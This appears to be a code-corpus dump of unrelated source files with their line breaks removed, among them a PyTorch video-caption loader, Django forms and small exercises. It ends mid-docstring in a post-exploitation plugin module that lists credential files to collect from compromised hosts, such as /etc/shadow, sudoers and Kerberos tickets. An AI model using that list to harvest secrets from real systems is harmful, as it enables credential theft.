None words_mask = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None text_data = (target, cap_bows, lengths, words_mask) return text_data, idxs, cap_ids class Dataset4DualEncoding(data.Dataset): """ Load captions and video frame features by pre-trained CNN model. """ def __init__(self, cap_file, visual_feat, bow2vec, vocab, n_caption=None, video2frames=None, visual_feat_target=None, video2frames_target=None, caption_file_target=None, visual_feat_source2=None, video2frames_source2=None, caption_file_source2=None): # Captions self.captions = {} self.captions_target = {} self.captions_source2 = {} self.cap_ids = [] self.cap_ids_target = [] self.cap_ids_source2 = [] self.visual_feat = visual_feat self.video2frames = video2frames self.visual_feat_target = visual_feat_target self.video2frames_target = video2frames_target self.visual_feat_source2 = visual_feat_source2 self.video2frames_source2 = video2frames_source2 with open(cap_file, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions[cap_id] = caption self.cap_ids.append(cap_id) if visual_feat_target!=None and video2frames_target!=None: with open(caption_file_target, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions_target[cap_id] = caption self.cap_ids_target.append(cap_id) if visual_feat_source2!=None and video2frames_source2!=None: with open(caption_file_source2, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions_source2[cap_id] = caption self.cap_ids_source2.append(cap_id) self.bow2vec = bow2vec self.vocab = vocab self.length = len(self.cap_ids) # self.cap_ids_target = self.cap_ids_target * 2 print(self.length) print(len(self.cap_ids_target)) # if n_caption is not None: # assert len(self.video_ids) * n_caption == self.length, "%d != %d" % (len(self.video_ids) * n_caption, self.length) def 
__getitem__(self, index): cap_id = self.cap_ids[index] video_id = getVideoId(cap_id) frame_list = self.video2frames[video_id] frame_vecs = [] for frame_id in frame_list: frame_vecs.append(self.visual_feat.read_one(frame_id)) frames_tensor = torch.Tensor(frame_vecs) caption = self.captions[cap_id] if self.bow2vec is not None: cap_bow = self.bow2vec.mapping(caption) if cap_bow is None: cap_bow = torch.zeros(self.bow2vec.ndims) else: cap_bow = torch.Tensor(cap_bow) else: cap_bow = None if self.vocab is not None: tokens = clean_str(caption) caption = [] caption.append(self.vocab('<start>')) caption.extend([self.vocab(token) for token in tokens]) caption.append(self.vocab('<end>')) cap_tensor = torch.Tensor(caption) else: cap_tensor = None if self.visual_feat_target != None and self.video2frames_target != None: cap_id_target = self.cap_ids_target[index] video_id_target = getVideoId(cap_id_target) frame_list = self.video2frames_target[video_id_target] frame_vecs_target = [] for frame_id in frame_list: frame_vecs_target.append(self.visual_feat_target.read_one(frame_id)) frames_tensor_target = torch.Tensor(frame_vecs_target) caption_target = self.captions_target[cap_id_target] # caption_target = self.cap_ids_target[index] # video_id_target = 'a' # frame_list = self.video2frames_target[self.target_video_id_list[index]] # frame_vecs_target = [] # for frame_id in frame_list: # frame_vecs_target.append(self.visual_feat_target.read_one(frame_id)) # frames_tensor_target = torch.Tensor(frame_vecs_target) if self.bow2vec is not None: cap_bow_target = self.bow2vec.mapping(caption_target) if cap_bow_target is None: cap_bow_target = torch.zeros(self.bow2vec.ndims) else: cap_bow_target = torch.Tensor(cap_bow_target) else: cap_bow_target = None if self.vocab is not None: tokens = clean_str(caption_target) caption_target = [] caption_target.append(self.vocab('<start>')) caption_target.extend([self.vocab(token) for token in tokens]) caption_target.append(self.vocab('<end>')) 
cap_tensor_target = torch.Tensor(caption_target) else: cap_tensor_target = None if self.visual_feat_source2 != None and self.video2frames_source2 != None: cap_id_source2 = self.cap_ids_source2[index] video_id_source2 = getVideoId(cap_id_source2) frame_list = self.video2frames_source2[video_id_source2] frame_vecs_source2 = [] for frame_id in frame_list: frame_vecs_source2.append(self.visual_feat_source2.read_one(frame_id)) frames_tensor_source2 = torch.Tensor(frame_vecs_source2) caption_source2 = self.captions_source2[cap_id_source2] # caption_source2 = self.cap_ids_source2[index] # video_id_source2 = 'a' # frame_list = self.video2frames_source2[self.source2_video_id_list[index]] # frame_vecs_source2 = [] # for frame_id in frame_list: # frame_vecs_source2.append(self.visual_feat_source2.read_one(frame_id)) # frames_tensor_source2 = torch.Tensor(frame_vecs_source2) if self.bow2vec is not None: cap_bow_source2 = self.bow2vec.mapping(caption_source2) if cap_bow_source2 is None: cap_bow_source2 = torch.zeros(self.bow2vec.ndims) else: cap_bow_source2 = torch.Tensor(cap_bow_source2) else: cap_bow_source2 = None if self.vocab is not None: tokens = clean_str(caption_source2) caption_source2 = [] caption_source2.append(self.vocab('<start>')) caption_source2.extend([self.vocab(token) for token in tokens]) caption_source2.append(self.vocab('<end>')) cap_tensor_source2 = torch.Tensor(caption_source2) else: cap_tensor_source2 = None return frames_tensor, cap_tensor, cap_bow, index, cap_id, video_id, frames_tensor_target, video_id_target, cap_tensor_target, cap_bow_target, frames_tensor_source2, video_id_source2, cap_tensor_source2, cap_bow_source2 else: return frames_tensor, cap_tensor, cap_bow, index, cap_id, video_id, frames_tensor_target, video_id_target, cap_tensor_target, cap_bow_target else: return frames_tensor, cap_tensor, cap_bow, index, cap_id, video_id def __len__(self): return self.length class VisDataSet4DualEncoding(data.Dataset): """ Load video frame features by 
pre-trained CNN model. """ def __init__(self, visual_feat, video2frames=None): self.visual_feat = visual_feat self.video2frames = video2frames self.video_ids = video2frames.keys() self.length = len(self.video_ids) def __getitem__(self, index): video_id = self.video_ids[index] frame_list = self.video2frames[video_id] frame_vecs = [] for frame_id in frame_list: frame_vecs.append(self.visual_feat.read_one(frame_id)) frames_tensor = torch.Tensor(frame_vecs) return frames_tensor, index, video_id def __len__(self): return self.length class TxtDataSet4DualEncoding(data.Dataset): """ Load captions """ def __init__(self, cap_file, bow2vec, vocab): # Captions self.captions = {} self.cap_ids = [] with open(cap_file, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions[cap_id] = caption self.cap_ids.append(cap_id) self.bow2vec = bow2vec self.vocab = vocab self.length = len(self.cap_ids) def __getitem__(self, index): cap_id = self.cap_ids[index] caption = self.captions[cap_id] if self.bow2vec is not None: cap_bow = self.bow2vec.mapping(caption) if cap_bow is None: cap_bow = torch.zeros(self.bow2vec.ndims) else: cap_bow = torch.Tensor(cap_bow) else: cap_bow = None if self.vocab is not None: tokens = clean_str(caption) caption = [] caption.append(self.vocab('<start>')) caption.extend([self.vocab(token) for token in tokens]) caption.append(self.vocab('<end>')) cap_tensor = torch.Tensor(caption) else: cap_tensor = None return cap_tensor, cap_bow, index, cap_id def __len__(self): return self.length def get_data_loaders(cap_files, visual_feats, vocab, bow2vec, batch_size=100, num_workers=2, n_caption=2, video2frames=None, video2frames_target=None, visual_feats_target=None, caption_file_target=None, multi_flag=0): """ Returns torch.utils.data.DataLoader for train and validation datasets Args: cap_files: caption files (dict) keys: [train, val] visual_feats: image feats (dict) keys: [train, val] """ if 
video2frames_target!=None and visual_feats_target!=None: if multi_flag == 0: dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train'], video2frames_target=video2frames_target['train'], visual_feat_target=visual_feats_target['train'], caption_file_target=caption_file_target), 'val': Dataset4DualEncoding(cap_files['val'], visual_feats['val'], bow2vec, vocab, n_caption, video2frames=video2frames['val']), 'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames=video2frames['test'])} else: dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train'], video2frames_target=video2frames_target['train'], visual_feat_target=visual_feats_target['train'], caption_file_target=caption_file_target, visual_feat_source2=visual_feats['train2'], video2frames_source2=video2frames['train2'], caption_file_source2=cap_files['train2']), 'val': Dataset4DualEncoding(cap_files['val'], visual_feats['val'], bow2vec, vocab, n_caption, video2frames=video2frames['val']), 'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames=video2frames['test'])} else: dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train']), 'val': Dataset4DualEncoding(cap_files['val'], visual_feats['val'], bow2vec, vocab, n_caption, video2frames=video2frames['val']), 'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames=video2frames['test'])} data_loaders = {x: torch.utils.data.DataLoader(dataset=dset[x], batch_size=batch_size, shuffle=(x=='train'), pin_memory=True, num_workers=num_workers, collate_fn=collate_frame_gru_fn) for x in ['train', 'val', 'test']} return data_loaders def get_test_data_loaders(cap_files, visual_feats, vocab, bow2vec, 
batch_size=100, num_workers=2, n_caption=2, video2frames = None): """ Returns torch.utils.data.DataLoader for test dataset Args: cap_files: caption files (dict) keys: [test] visual_feats: image feats (dict) keys: [test] """ dset = {'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames = video2frames['test'])} data_loaders = {x: torch.utils.data.DataLoader(dataset=dset[x], batch_size=batch_size, shuffle=False, pin_memory=True, num_workers=num_workers, collate_fn=collate_frame_gru_fn) for x in cap_files } return data_loaders def get_vis_data_loader(vis_feat, batch_size=100, num_workers=2, video2frames=None): dset = VisDataSet4DualEncoding(vis_feat, video2frames) data_loader = torch.utils.data.DataLoader(dataset=dset, batch_size=batch_size, shuffle=False, pin_memory=True, num_workers=num_workers, collate_fn=collate_frame) return data_loader def get_txt_data_loader(cap_file, vocab, bow2vec, batch_size=100, num_workers=2): dset = TxtDataSet4DualEncoding(cap_file, bow2vec, vocab) data_loader = torch.utils.data.DataLoader(dataset=dset, batch_size=batch_size, shuffle=False, pin_memory=True, num_workers=num_workers, collate_fn=collate_text) return data_loader if __name__ == '__main__': pass
en
0.470059
Build mini-batch tensors from a list of (video, caption) tuples. # Sort a data list by caption length # Merge videos (convert tuple of 1D tensor to 4D tensor) # Merge captions (convert tuple of 1D tensor to 2D tensor) # Merge captions (convert tuple of 1D tensor to 2D tensor) # Merge videos (convert tuple of 1D tensor to 4D tensor) # Merge captions (convert tuple of 1D tensor to 2D tensor) # Merge captions (convert tuple of 1D tensor to 2D tensor) # Merge captions (convert tuple of 1D tensor to 2D tensor) # Merge videos (convert tuple of 1D tensor to 4D tensor) # Merge captions (convert tuple of 1D tensor to 2D tensor) # Merge videos (convert tuple of 1D tensor to 4D tensor) # Merge captions (convert tuple of 1D tensor to 2D tensor) Load captions and video frame features by pre-trained CNN model. # Captions # self.cap_ids_target = self.cap_ids_target * 2 # if n_caption is not None: # assert len(self.video_ids) * n_caption == self.length, "%d != %d" % (len(self.video_ids) * n_caption, self.length) # caption_target = self.cap_ids_target[index] # video_id_target = 'a' # frame_list = self.video2frames_target[self.target_video_id_list[index]] # frame_vecs_target = [] # for frame_id in frame_list: # frame_vecs_target.append(self.visual_feat_target.read_one(frame_id)) # frames_tensor_target = torch.Tensor(frame_vecs_target) # caption_source2 = self.cap_ids_source2[index] # video_id_source2 = 'a' # frame_list = self.video2frames_source2[self.source2_video_id_list[index]] # frame_vecs_source2 = [] # for frame_id in frame_list: # frame_vecs_source2.append(self.visual_feat_source2.read_one(frame_id)) # frames_tensor_source2 = torch.Tensor(frame_vecs_source2) Load video frame features by pre-trained CNN model. 
Load captions # Captions Returns torch.utils.data.DataLoader for train and validation datasets Args: cap_files: caption files (dict) keys: [train, val] visual_feats: image feats (dict) keys: [train, val] Returns torch.utils.data.DataLoader for test dataset Args: cap_files: caption files (dict) keys: [test] visual_feats: image feats (dict) keys: [test]
2.608207
3
accounts/forms.py
morenoh149/djangox-autocomplete-light
1
6618598
<reponame>morenoh149/djangox-autocomplete-light from django import forms from django.contrib.auth.forms import UserCreationForm, UserChangeForm from .models import CustomUser from dal import autocomplete class CustomUserCreationForm(UserCreationForm): class Meta(UserCreationForm.Meta): model = CustomUser fields = ('email', 'username',) class CustomUserChangeForm(UserChangeForm): class Meta: model = CustomUser fields = ('email', 'username',) class PersonForm(forms.ModelForm): email = forms.ModelChoiceField( queryset=CustomUser.objects.all(), widget=autocomplete.ModelSelect2(url='custom-user-autocomplete') ) class Meta: model = CustomUser fields = ('email', 'username')
from django import forms from django.contrib.auth.forms import UserCreationForm, UserChangeForm from .models import CustomUser from dal import autocomplete class CustomUserCreationForm(UserCreationForm): class Meta(UserCreationForm.Meta): model = CustomUser fields = ('email', 'username',) class CustomUserChangeForm(UserChangeForm): class Meta: model = CustomUser fields = ('email', 'username',) class PersonForm(forms.ModelForm): email = forms.ModelChoiceField( queryset=CustomUser.objects.all(), widget=autocomplete.ModelSelect2(url='custom-user-autocomplete') ) class Meta: model = CustomUser fields = ('email', 'username')
none
1
2.312284
2
brick_server/minimal/dbs.py
BrickSchema/brick-example-server
3
6618599
<reponame>BrickSchema/brick-example-server<gh_stars>1-10 from fastapi_rest_framework.config import settings from mongoengine import connect as mongo_connect from brick_server.minimal.interfaces import AsyncpgTimeseries, RealActuation from brick_server.minimal.interfaces.grafana import GrafanaEndpoint from brick_server.minimal.interfaces.graphdb import GraphDB mongo_connection = mongo_connect( host=settings.mongo_host, port=settings.mongo_port, username=settings.mongo_username, password=<PASSWORD>, db=settings.mongo_dbname, connect=False, ) actuation_iface = RealActuation() # brick_configs = configs["brick"] brick_url = ( f"http://{settings.brick_host}:{settings.brick_port}/{settings.brick_api_endpoint}" ) # brick_sparql = BrickSparqlAsync( # brick_url, # settings.brick_version, # graph=settings.brick_base_graph, # base_ns=settings.brick_base_ns, # ) # # brick_sparql_sync = BrickSparql( # brick_url, # settings.brick_version, # graph=settings.brick_base_graph, # base_ns=settings.brick_base_ns, # ) graphdb = GraphDB( host=settings.graphdb_host, port=settings.graphdb_port, repository=settings.graphdb_repository, ) # brick_ts_configs = configs["timeseries"] ts_db = AsyncpgTimeseries( settings.timescale_dbname, settings.timescale_username, settings.timescale_password, settings.timescale_host, settings.timescale_port, ) grafana_url = f"http://{settings.grafana_host}:{settings.grafana_port}/{settings.grafana_api_endpoint}" grafana_endpoint = GrafanaEndpoint(grafana_url, settings.grafana_api_key)
from fastapi_rest_framework.config import settings from mongoengine import connect as mongo_connect from brick_server.minimal.interfaces import AsyncpgTimeseries, RealActuation from brick_server.minimal.interfaces.grafana import GrafanaEndpoint from brick_server.minimal.interfaces.graphdb import GraphDB mongo_connection = mongo_connect( host=settings.mongo_host, port=settings.mongo_port, username=settings.mongo_username, password=<PASSWORD>, db=settings.mongo_dbname, connect=False, ) actuation_iface = RealActuation() # brick_configs = configs["brick"] brick_url = ( f"http://{settings.brick_host}:{settings.brick_port}/{settings.brick_api_endpoint}" ) # brick_sparql = BrickSparqlAsync( # brick_url, # settings.brick_version, # graph=settings.brick_base_graph, # base_ns=settings.brick_base_ns, # ) # # brick_sparql_sync = BrickSparql( # brick_url, # settings.brick_version, # graph=settings.brick_base_graph, # base_ns=settings.brick_base_ns, # ) graphdb = GraphDB( host=settings.graphdb_host, port=settings.graphdb_port, repository=settings.graphdb_repository, ) # brick_ts_configs = configs["timeseries"] ts_db = AsyncpgTimeseries( settings.timescale_dbname, settings.timescale_username, settings.timescale_password, settings.timescale_host, settings.timescale_port, ) grafana_url = f"http://{settings.grafana_host}:{settings.grafana_port}/{settings.grafana_api_endpoint}" grafana_endpoint = GrafanaEndpoint(grafana_url, settings.grafana_api_key)
en
0.363709
# brick_configs = configs["brick"] # brick_sparql = BrickSparqlAsync( # brick_url, # settings.brick_version, # graph=settings.brick_base_graph, # base_ns=settings.brick_base_ns, # ) # # brick_sparql_sync = BrickSparql( # brick_url, # settings.brick_version, # graph=settings.brick_base_graph, # base_ns=settings.brick_base_ns, # ) # brick_ts_configs = configs["timeseries"]
2.0593
2
eventpy/internal/lockguard.py
wqking/eventpy
19
6618600
<gh_stars>10-100 # eventpy library # Copyright (C) 2020 <NAME> (wqking) # Github: https://github.com/wqking/eventpy # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. class LockGuard : def __init__(self, lock) : self._lock = lock def __enter__(self) : self.lock() return self def __exit__(self, type, value, traceBack) : self.unlock() def lock(self) : self._lock.acquire() def unlock(self) : self._lock.release()
# eventpy library # Copyright (C) 2020 <NAME> (wqking) # Github: https://github.com/wqking/eventpy # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. class LockGuard : def __init__(self, lock) : self._lock = lock def __enter__(self) : self.lock() return self def __exit__(self, type, value, traceBack) : self.unlock() def lock(self) : self._lock.acquire() def unlock(self) : self._lock.release()
en
0.842423
# eventpy library # Copyright (C) 2020 <NAME> (wqking) # Github: https://github.com/wqking/eventpy # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License.
1.755205
2
docs/examples/yuv_capture4.py
simonyangme/picamera
1,311
6618601
<gh_stars>1000+ import time import picamera import picamera.array import numpy as np with picamera.PiCamera() as camera: camera.resolution = (100, 100) time.sleep(2) y_data = np.empty((112, 128), dtype=np.uint8) try: camera.capture(y_data, 'yuv') except IOError: pass y_data = y_data[:100, :100] # y_data now contains the Y-plane only
import time import picamera import picamera.array import numpy as np with picamera.PiCamera() as camera: camera.resolution = (100, 100) time.sleep(2) y_data = np.empty((112, 128), dtype=np.uint8) try: camera.capture(y_data, 'yuv') except IOError: pass y_data = y_data[:100, :100] # y_data now contains the Y-plane only
en
0.638033
# y_data now contains the Y-plane only
2.817482
3
URI1037.py
rashidulhasanhridoy/URI-Online-Judge-Problem-Solve-with-Python-3
2
6618602
<gh_stars>1-10 A = float(input('')) if A >= 0 and A <= 25: print('Intervalo [0,25]') elif A > 25 and A <= 50: print('Intervalo (25,50]') elif A > 50 and A <= 75: print('Intervalo (50,75]') elif A > 75 and A <= 100: print('Intervalo (75,100]') else: print('Fora de intervalo')
A = float(input('')) if A >= 0 and A <= 25: print('Intervalo [0,25]') elif A > 25 and A <= 50: print('Intervalo (25,50]') elif A > 50 and A <= 75: print('Intervalo (50,75]') elif A > 75 and A <= 100: print('Intervalo (75,100]') else: print('Fora de intervalo')
none
1
3.887084
4
test/__init__.py
marcintustin/xnmt
0
6618603
<reponame>marcintustin/xnmt<filename>test/__init__.py import dynet_config dynet_config.set(random_seed=2)
import dynet_config dynet_config.set(random_seed=2)
none
1
1.219629
1
src/pytorch-project/config/config_init.py
kaderghal/ADNI_Data_processing
5
6618604
<filename>src/pytorch-project/config/config_init.py #!/usr/bin/python3 # ==================================================== # Author: <NAME> # Year: 2019 # Labs: LaBRI & LabSIV # for ADNI Dataset : ADNI-1 baseline SMRI # screening selected dataset # URL: http://adni.loni.usc.edu/ # ==================================================== #------------------------------------------------------------------------------------------ # Debuging & Time Zone #------------------------------------------------------------------------------------------ DEBUG = False TIMEZONE = 'France/Bordeaux' #------------------------------------------------------------------------------------------ # Author Informations #------------------------------------------------------------------------------------------ AUTHOR_INFO = { 'author': '<NAME>', 'name': 'ALZ-ADNI PCS', 'version': '1.2', 'year': '2019', 'description': 'Data Extracting scripts for CNN Alzheimer\'s Disease Classification', 'url': 'http://github.com/kaderghal', 'email': '<EMAIL>', 'university': 'Université de Bordeaux (Bordeaux)/ University IBN Zohr (Agadir)', 'lab': 'LaBRI & LabSIV' } #------------------------------------------------------------------------------------------ # Root path to local workspace (local Machine) #------------------------------------------------------------------------------------------ ROOT_PATH_LOCAL_MACHINE = { 'root_machine': '/home/karim/workspace/ADNI_workspace' } #------------------------------------------------------------------------------------------ # Root path to local workspace (local Machine) #------------------------------------------------------------------------------------------ ROOT_PATH_LOCAL_MACHINE = { 'root_machine': '/home/karim/workspace/ADNI_workspace' } #------------------------------------------------------------------------------------------ # Global parameters: # -> Path to the used Deep learning Framework # -> Path to the output resutls 
#------------------------------------------------------------------------------------------ GLOBAL_PARAMS = { 'pytorch_root': ROOT_PATH_LOCAL_MACHINE['root_machine'] + '/path/to/pythorch/', 'adni_data_src': ROOT_PATH_LOCAL_MACHINE['root_machine'] + '/results/ADNI_src/', 'adni_data_des': ROOT_PATH_LOCAL_MACHINE['root_machine'] + '/results/ADNI_des/' } training_dir = "./data/faces/training/" testing_dir = "./data/faces/testing/" train_batch_size = 64 train_number_epochs = 100 NETWORK_PARAMS = { 'train_folder' : GLOBAL_PARAMS['adni_data_des'] + '', 'valid_folder' :, 'test_folder' : }
<filename>src/pytorch-project/config/config_init.py #!/usr/bin/python3 # ==================================================== # Author: <NAME> # Year: 2019 # Labs: LaBRI & LabSIV # for ADNI Dataset : ADNI-1 baseline SMRI # screening selected dataset # URL: http://adni.loni.usc.edu/ # ==================================================== #------------------------------------------------------------------------------------------ # Debuging & Time Zone #------------------------------------------------------------------------------------------ DEBUG = False TIMEZONE = 'France/Bordeaux' #------------------------------------------------------------------------------------------ # Author Informations #------------------------------------------------------------------------------------------ AUTHOR_INFO = { 'author': '<NAME>', 'name': 'ALZ-ADNI PCS', 'version': '1.2', 'year': '2019', 'description': 'Data Extracting scripts for CNN Alzheimer\'s Disease Classification', 'url': 'http://github.com/kaderghal', 'email': '<EMAIL>', 'university': 'Université de Bordeaux (Bordeaux)/ University IBN Zohr (Agadir)', 'lab': 'LaBRI & LabSIV' } #------------------------------------------------------------------------------------------ # Root path to local workspace (local Machine) #------------------------------------------------------------------------------------------ ROOT_PATH_LOCAL_MACHINE = { 'root_machine': '/home/karim/workspace/ADNI_workspace' } #------------------------------------------------------------------------------------------ # Root path to local workspace (local Machine) #------------------------------------------------------------------------------------------ ROOT_PATH_LOCAL_MACHINE = { 'root_machine': '/home/karim/workspace/ADNI_workspace' } #------------------------------------------------------------------------------------------ # Global parameters: # -> Path to the used Deep learning Framework # -> Path to the output resutls 
#------------------------------------------------------------------------------------------ GLOBAL_PARAMS = { 'pytorch_root': ROOT_PATH_LOCAL_MACHINE['root_machine'] + '/path/to/pythorch/', 'adni_data_src': ROOT_PATH_LOCAL_MACHINE['root_machine'] + '/results/ADNI_src/', 'adni_data_des': ROOT_PATH_LOCAL_MACHINE['root_machine'] + '/results/ADNI_des/' } training_dir = "./data/faces/training/" testing_dir = "./data/faces/testing/" train_batch_size = 64 train_number_epochs = 100 NETWORK_PARAMS = { 'train_folder' : GLOBAL_PARAMS['adni_data_des'] + '', 'valid_folder' :, 'test_folder' : }
en
0.17756
#!/usr/bin/python3 # ==================================================== # Author: <NAME> # Year: 2019 # Labs: LaBRI & LabSIV # for ADNI Dataset : ADNI-1 baseline SMRI # screening selected dataset # URL: http://adni.loni.usc.edu/ # ==================================================== #------------------------------------------------------------------------------------------ # Debuging & Time Zone #------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------ # Author Informations #------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------ # Root path to local workspace (local Machine) #------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------ # Root path to local workspace (local Machine) #------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------ # Global parameters: # -> Path to the used Deep learning Framework # -> Path to the output resutls #------------------------------------------------------------------------------------------
1.701292
2
2020/examples-in-class-2020-11-26/run_course4.py
ati-ozgur/course-python
1
6618605
from course4 import Course,Student c1 = Course("Programming in Python","Atilla Özgür") c1.add_lesson_time("Thursday","11:15") c1.add_lesson_time("Thursday","12:45") c1.print_lesson_times() s1 = Student("Yousuf","Farooq","23342432") c1.add_student(s1) c1.print_student_list()
from course4 import Course,Student c1 = Course("Programming in Python","Atilla Özgür") c1.add_lesson_time("Thursday","11:15") c1.add_lesson_time("Thursday","12:45") c1.print_lesson_times() s1 = Student("Yousuf","Farooq","23342432") c1.add_student(s1) c1.print_student_list()
none
1
3.297075
3
leetcode/hard/Longest_Consecutive_Sequence.py
shhuan/algorithms
0
6618606
<gh_stars>0 # -*- coding: utf-8 -*- """ Given an unsorted array of integers, find the length of the longest consecutive elements sequence. For example, Given [100, 4, 200, 1, 3, 2], The longest consecutive elements sequence is [1, 2, 3, 4]. Return its length: 4. Your algorithm should run in O(n) complexity. """ __author__ = 'huash' import sys import os import collections import math import itertools class Solution: # @param {integer[]} nums # @return {integer} def longestConsecutive(self, nums): if not nums: return 0 nums = set(nums) maxLen = 0 while nums: num = nums.pop() count = 1 r = num + 1 while r in nums: count += 1 nums.remove(r) r += 1 l = num - 1 while l in nums: count += 1 nums.remove(l) l -= 1 maxLen = max(maxLen, count) return maxLen s = Solution() print(s.longestConsecutive([100, 4, 200, 1, 3, 2]))
# -*- coding: utf-8 -*- """ Given an unsorted array of integers, find the length of the longest consecutive elements sequence. For example, Given [100, 4, 200, 1, 3, 2], The longest consecutive elements sequence is [1, 2, 3, 4]. Return its length: 4. Your algorithm should run in O(n) complexity. """ __author__ = 'huash' import sys import os import collections import math import itertools class Solution: # @param {integer[]} nums # @return {integer} def longestConsecutive(self, nums): if not nums: return 0 nums = set(nums) maxLen = 0 while nums: num = nums.pop() count = 1 r = num + 1 while r in nums: count += 1 nums.remove(r) r += 1 l = num - 1 while l in nums: count += 1 nums.remove(l) l -= 1 maxLen = max(maxLen, count) return maxLen s = Solution() print(s.longestConsecutive([100, 4, 200, 1, 3, 2]))
en
0.761564
# -*- coding: utf-8 -*- Given an unsorted array of integers, find the length of the longest consecutive elements sequence. For example, Given [100, 4, 200, 1, 3, 2], The longest consecutive elements sequence is [1, 2, 3, 4]. Return its length: 4. Your algorithm should run in O(n) complexity. # @param {integer[]} nums # @return {integer}
3.8283
4
flag_slurper/autolib/post.py
Mab879/flag-slurper
4
6618607
""" Tasks to do after checking/retrieving flags. These functions **MUST NOT** bubble exceptions. A post task failing does not mean the protocol has failed, just any of the fun stuff you want to do afterwards. Things that belong here: - grabbing fun (non-flag) files - spawning reverse shells Things that don't belong here: - grabbing flags """ import logging import os from abc import ABC, abstractmethod from collections import deque from typing import Tuple, Type, Dict, List, Iterable import paramiko from schema import Schema, Optional from flag_slurper.autolib import Service from .exploit import get_directory, get_file, run_command, run_sudo, expand_wildcard from .models import Credential, File, ShadowEntry logger = logging.getLogger(__name__) #: Sensitive files to find on systems. Paths #: ending in / are directories. SENSITIVE_FILES = [ # Authentication '/etc/passwd', '/etc/shadow', '/etc/sudoers', '/etc/sudoers.d/', # Kerberos '/tmp/krb*', '/etc/krb*', '/etc/sssd/', # Cron '/etc/crontab', '/etc/cron.d/', '/etc/cron.daily/', '/etc/cron.hourly/', '/etc/cron.monthly/', '/etc/cron.weekly/', # Shell configs and profiles '/etc/skel/', '/etc/**/.bashrc', '/etc/**/.bash_profile', '/etc/**/.zshrc', '/etc/**/.profile' ] class PostContext(dict): """ A wrapper method for passing post pwn methods arbitrary data. This allows pwn functions to pass whatever arbitrary data they need onto the post plugins in an extensible way. """ def validate(self, schema: dict) -> 'PostContext': """ Allow a plugin to enforce their own schema for their context data. The ``Schema`` object is created by the context, not the plugin. :param schema: A dictionary containing the schema :return: Returns the context for chaining """ Schema(schema, ignore_extra_keys=True).validate(self) return self class PostPlugin(ABC): """ Defines a post pwn plugin. Plugins are configured in the ``post`` key to a project. For example: .. code-block:: yaml --- _version: "0.1" ... 
post: - service: WWW SSH commands: - <post plugin name>: <arguments> """ name = None schema = None context_schema = None config = None depends_on = [] def configure(self, config: dict) -> dict: """ Configure the plugin. This provides the base configuration implementation. It simply just validates the schema against the given config. Plugins that need more involved configuration may override this method. Plugins must define their own schema by overriding the ``schema`` class variable. :param config: :return: """ if not self.schema: raise ValueError('The schema for {} has not been configured'.format(self.name)) config = Schema(self.schema).validate(config) self.config = config logger.info('Configuring plugin: %s', self.config) return config def unconfigure(self): """ Remove any previous configuration. This is used between post exploits. """ self.config = None @abstractmethod def run(self, service: Service, context: PostContext) -> bool: """ Run the post pwn plugin. This is where the plugin will perform any actions it needs. All run methods MUST call their super before accessing the given context, otherwise it must attempt to safely access context entries. :param service: The service we are currently attacking :param context: The context given to the post plugin :returns: True if successful, False otherwise :raises ValueError: if the context schema has not been set """ if self.context_schema is None: raise ValueError('The context_schema for {} has not been configured'.format(self.name)) context.validate(self.context_schema) return True @abstractmethod def predicate(self, service: Service, context: PostContext) -> bool: """ Determines whether the plugin should be run for the given service, context, and configuration. The plugin's configuration will have been validated at this point. 
:param service: The current service to test against :param context: The current post context :return: True if this plugin should run, False otherwise """ raise NotImplementedError class PluginRegistry: """ The post pwn plugin registry. This handles configuring and figuring out which plugins will need to be run. """ def __init__(self): self.registry: Dict[str, PostPlugin] = {} def register(self, plugin: Type[PostPlugin]): """ Register a plugin with the plugin registry. :param plugin: The plugin class to register. :raises ValueError: If the plugin does not subclass :py:class:`PostPlugin`. :raises ValueError: If the plugin name is already taken. """ if not issubclass(plugin, PostPlugin): raise ValueError('Plugins must extend PostPlugin') if plugin.name in self.registry: raise ValueError('Plugin already registered by this name: {}'.format(plugin.name)) self.registry[plugin.name] = plugin() # The plugins that will be used for the current run self.run_plugins = [] def configure(self, config: List[dict]): """ Configure the plugins that will be used for this run. This will accept the ``commands`` section for the current service. :param config: The post config for the current service. :raises KeyError: When a command is specified that doesn't exist. :raises ValueError: When more than one key in a command entry. :raises ValueError: When a command uses an 